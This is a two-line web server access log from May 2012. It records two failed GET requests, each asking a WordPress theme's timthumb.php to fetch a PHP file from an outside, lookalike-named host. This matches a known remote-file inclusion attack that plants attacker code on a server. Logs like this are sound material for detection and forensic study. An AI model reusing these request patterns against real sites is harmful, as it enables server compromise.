31.7.34.14 - - [14/May/2012:01:03:04 +0200] "GET //wp-content/themes/business-turnkey/assets/js/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/xx.php HTTP/1.1" 404 340 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
46.45.138.202 - - [14/May/2012:01:03:21 +0200] "GET /stats//wp-content/themes/business-turnkey/assets/js/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
